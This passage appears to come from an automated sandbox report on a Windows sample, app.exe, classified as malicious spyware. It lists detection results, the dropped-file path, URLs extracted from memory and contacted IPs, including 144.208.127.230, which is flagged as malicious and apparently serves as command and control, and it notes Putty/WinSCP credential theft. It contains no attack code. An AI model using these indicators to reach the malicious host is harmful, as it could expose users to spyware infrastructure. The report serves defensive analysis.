dynamic memory) 13->53 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->55 57 7 other signatures 13->57 19 cmd.exe 1 13->19         started        21 conhost.exe 13->21         started        signatures9 process10 process11 23 conhost.exe 19->23         started        25 timeout.exe 1 19->25         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
app.exe11%ReversingLabs
app.exe100%Joe Sandbox ML
app.exe11%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe11%ReversingLabs
C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe11%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://144.208.127.230/J0%Avira URL Cloudsafe
http://144.208.127.230/v0%Avira URL Cloudsafe
http://144.208.127.230:80/w0%Avira URL Cloudsafe
http://144.208.127.230/0%Avira URL Cloudsafe
http://144.208.127.230/z0%Avira URL Cloudsafe
http://144.208.127.230/z0%VirustotalBrowse
http://144.208.127.2300%Avira URL Cloudsafe
http://144.208.127.230/B0%Avira URL Cloudsafe
http://144.208.127.230/J0%VirustotalBrowse
http://144.208.127.230/0%VirustotalBrowse
http://144.208.127.230:80/w0%VirustotalBrowse
http://144.208.127.230/Y0%Avira URL Cloudsafe
http://144.208.127.230/U0%Avira URL Cloudsafe
https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
http://144.208.127.230:80/0%Avira URL Cloudsafe
http://144.208.127.230:80/-35b871f0a6610%Avira URL Cloudsafe
http://144.208.127.230:80/L0%Avira URL Cloudsafe
http://144.208.127.2300%VirustotalBrowse
http://144.208.127.230/70%Avira URL Cloudsafe
http://144.208.127.230:80/0%VirustotalBrowse
http://144.208.127.230/Y0%VirustotalBrowse
https://POSTHTTP/1.1Content-Type:0%Avira URL Cloudsafe
http://144.208.127.230/e&0%Avira URL Cloudsafe
https://alldrivers4devices.net0%Avira URL Cloudsafe
http://144.208.127.230:80/o0%Avira URL Cloudsafe
http://144.208.127.230/70%VirustotalBrowse
http://144.208.127.230/~0%Avira URL Cloudsafe
http://144.208.127.230:80/T0%Avira URL Cloudsafe
http://www.quovadis.bm00%Avira URL Cloudsafe
http://144.208.127.230:80/-35b871f0a661ozi0%Avira URL Cloudsafe
http://144.208.127.230:80/R0%Avira URL Cloudsafe
http://144.208.127.230:80/T0%VirustotalBrowse
http://144.208.127.230U0%Avira URL Cloudsafe
http://144.208.127.230/~0%VirustotalBrowse
https://alldrivers4devices.net1%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
172.67.74.152
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://144.208.127.230/true
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://api.ipify.org/false
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://duckduckgo.com/chrome_newtabapp.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drfalse
        		high
        https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchapp.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drfalse
          		high
          https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://duckduckgo.com/ac/?q=Web Data.3.drfalse
              		high
              https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/downloadapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://windows-drivers-x04.blogspot.comapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://www.autoitscript.comapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXEapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8-_app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://support.google.com/chrome/?p=plugin_flashapp.exe, 00000003.00000003.3177221257.00000000055AC000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://consent.trustarc.comapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://144.208.127.230/zapp.exe, 00000003.00000003.3246373817.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.0000000000956000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://144.208.127.230:80/wapp.exe, 00000003.00000003.3139260264.0000000005588000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123698644.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3134624186.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3125985144.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3139068962.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3136784723.0000000005586000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://144.208.127.230/vapp.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2Fapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://secure.eicar.org/eicar.com;9app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.google.comapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://144.208.127.230/Japp.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.eicar.org/download-anti-malware-testfile/:app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttpapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drfalse
                                              		high
                                              https://office.com/setupapp.exe, 00000003.00000003.3182859527.00000000055F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://144.208.127.230/Bapp.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107954475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3103448637.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://lh5.googleusercontent.com/p/AF1QipOvNh-L3TTVll_wDyQd66TEaShUCp3i0iabc8se=w92-h92-n-k-noapp.exe, 00000003.00000003.3242282826.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242197510.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246273895.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://144.208.127.230app.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.google.com/search?q=atapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://144.208.127.230/Yapp.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292Kapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://secure.eicar.org/eicar.com.txtDapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bTapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abrapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://lh5.googleusercontent.com/p/AF1QipPFr704HJkdqZ5xefxGs53Btx8SeAbaCnWxa6-y=w92-h92-n-k-noapp.exe, 00000003.00000003.3242282826.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242197510.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246273895.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://144.208.127.230/Uapp.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://ocsp.quovadisoffshore.com0app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://setup.office.com/?ms.officeurl=setupapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://144.208.127.230:80/app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • 0%, Virustotal, Browse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://recoveringlib.blogspot.comapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://144.208.127.230:80/-35b871f0a661app.exe, 00000003.00000003.3105612570.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107523130.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3101845651.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3111746106.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3103619876.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3109755043.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoapp.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drfalse
                                                                        		high
                                                                        https://aka.office.com/office/url/setupMicrosoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://144.208.127.230:80/Lapp.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://secure.eicar.org/eicar.comapp.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://aka.office.com/office/url/setupapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3DsetupSignapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exeapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://144.208.127.230/7app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • 0%, Virustotal, Browse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.google.com/search?q=autoitapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Web Data.3.drfalse
                                                                                        		high
                                                                                        https://setup.office.com/?ms.officeurl=setupMicrosoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://POSTHTTP/1.1Content-Type:app.exe, 00000003.00000002.3295913444.0000000002530000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		low
                                                                                          http://144.208.127.230/e&app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://secure.eicar.org/eicar.com.txt/app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.google.com/search?q=eicarapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://secure.eicar.org/eicar.com/app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cfapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.office.com/setupapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup2Vapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.google.com/favicon.icoapp.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://alldrivers4devices.netapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • 1%, Virustotal, Browse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://office.com/setupMicrosoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://support.google.com/chrome/?p=plugin_flashaertapp.exe, 00000003.00000003.3177221257.00000000055AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://ac.ecosia.org/autocomplete?q=app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.eicar.org/download-anti-malware-testfile/Downloadapp.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8.app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.office.com/setupMicrosoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue/app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://144.208.127.230:80/oapp.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2Fapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.autoitscript.com/site/autoit/downloads/AutoItapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://144.208.127.230/~app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • 0%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://144.208.127.230:80/Tapp.exe, 00000003.00000003.3105612570.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107523130.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3111746106.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3109755043.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • 0%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://www.quovadis.bm0app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://144.208.127.230:80/-35b871f0a661oziapp.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://144.208.127.230:80/Rapp.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continueapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://144.208.127.230Uapp.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		low
                                                                                                                                      https://secure.eicar.org/eicar.com.txtapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.autoitscript.com/site/autoit/downloads/7app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          144.208.127.230
                                                                                                                                          		unknownUnited States
                                                                                                                                          		395092SHOCK-1UStrue
                                                                                                                                          172.67.74.152
                                                                                                                                          		api.ipify.orgUnited States
                                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                          Analysis ID:1436386
                                                                                                                                          Start date and time:2024-05-05 00:21:26 +02:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 9m 57s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                          Run name:Suspected VM Detection
                                                                                                                                          Number of analysed new started processes analysed:8
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample name:app.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.spyw.evad.winEXE@10/6@1/2
